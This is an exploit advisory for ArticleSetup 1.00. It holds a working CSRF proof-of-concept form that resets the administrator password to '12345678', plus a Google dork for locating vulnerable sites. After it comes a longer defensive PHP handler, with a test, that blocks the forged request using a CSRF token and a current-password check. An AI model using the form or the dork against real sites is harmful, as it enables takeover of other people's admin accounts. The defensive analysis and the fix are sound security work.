ArticleSetup 1.00 Cross Site Request Forgery
Posted on 10 June 2016
<!--
# Exploit Title : ArticleSetup 1.00 - CSRF Change Admin Password
# Google Dork : inurl:/article.php?id= intext:Powered By Article Marketing
# Date: 2016/06/04
# Exploit Author: Ali Ghanbari
# Vendor Homepage: http://articlesetup.com/
# Software Link: http://www.ArticleSetup.com/downloads/ArticleSetup-Latest.zip
# Version: 1.00
# Desc: When the admin clicks on a malicious link, the attacker can log in as a new Administrator with the credentials detailed below.
# Exploit:
-->
<html>
<body>
<form method="post" action="http://localhost/{PACH}/admin/adminsettings.php">
  <input type="hidden" name="update" value="1">
  <input type="hidden" name="pass1" value="12345678">
  <input type="hidden" name="pass2" value="12345678">
  <input type="submit" value="create">
</form>
</body>
</html>
<!--
####################################
[+]Exploit by: Ali Ghanbari
[+]My Telegram :@Exploiter007
-->
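
The request above carries only `update`, `pass1` and `pass2`: it has no per-session token, and it does not ask for the current password. The following server-side check rejects such a request. It is an added example, not ArticleSetup's code or the exploit author's, and the `csrf_token` and `current_pass` fields and both function names are assumptions.

```php
<?php
declare(strict_types=1);
// Hypothetical hardened handler; not ArticleSetup code. The field names update,
// pass1 and pass2 come from the form above; csrf_token, current_pass and the
// function names are assumptions made for this example.

function start_admin_session(): void
{
    // SameSite=Strict keeps the session cookie off cross-site form posts.
    session_set_cookie_params(['httponly' => true, 'secure' => true, 'samesite' => 'Strict']);
    session_start();
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32)); // embed in the settings form
    }
}

// Returns [accepted, reason] for a password-change POST.
function check_password_change(array $post, array $session, string $storedHash): array
{
    $sent  = $post['csrf_token'] ?? null;
    $known = $session['csrf_token'] ?? null;
    if (!is_string($sent) || !is_string($known) || $known === '' || !hash_equals($known, $sent)) {
        return [false, 'missing or invalid CSRF token'];
    }
    // Re-authentication: a forged request cannot supply the current password.
    $current = $post['current_pass'] ?? null;
    if (!is_string($current) || !password_verify($current, $storedHash)) {
        return [false, 'current password incorrect'];
    }
    $p1 = $post['pass1'] ?? null;
    $p2 = $post['pass2'] ?? null;
    if (!is_string($p1) || $p1 === '' || $p1 !== $p2) {
        return [false, 'new passwords do not match'];
    }
    return [true, 'ok'];
}

if (PHP_SAPI === 'cli') {
    // Constructed sample data: a session token, a stored hash, and two requests.
    $session = ['csrf_token' => bin2hex(random_bytes(32))];
    $stored  = password_hash('old-admin-pass', PASSWORD_DEFAULT);
    $forged  = ['update' => '1', 'pass1' => '12345678', 'pass2' => '12345678'];
    $genuine = $forged + ['csrf_token' => $session['csrf_token'], 'current_pass' => 'old-admin-pass'];
    foreach (['forged' => $forged, 'genuine' => $genuine] as $name => $req) {
        [$ok, $why] = check_password_change($req, $session, $stored);
        printf("%-8s %s (%s)\n", $name, $ok ? 'accepted' : 'rejected', $why);
    }
}
```

Run from the command line, the request built from the PoC's three fields is rejected at the token check, while the request that includes the session token and the current password is accepted.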